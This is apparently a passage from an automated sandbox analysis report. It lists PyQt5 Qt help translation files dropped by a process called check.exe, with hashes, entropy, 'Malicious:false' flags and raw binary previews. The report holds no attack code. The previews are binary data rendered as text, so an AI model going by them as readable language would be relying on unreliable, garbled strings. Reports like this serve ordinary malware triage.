                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_help_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                                                      MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                                                      SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                                                      SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
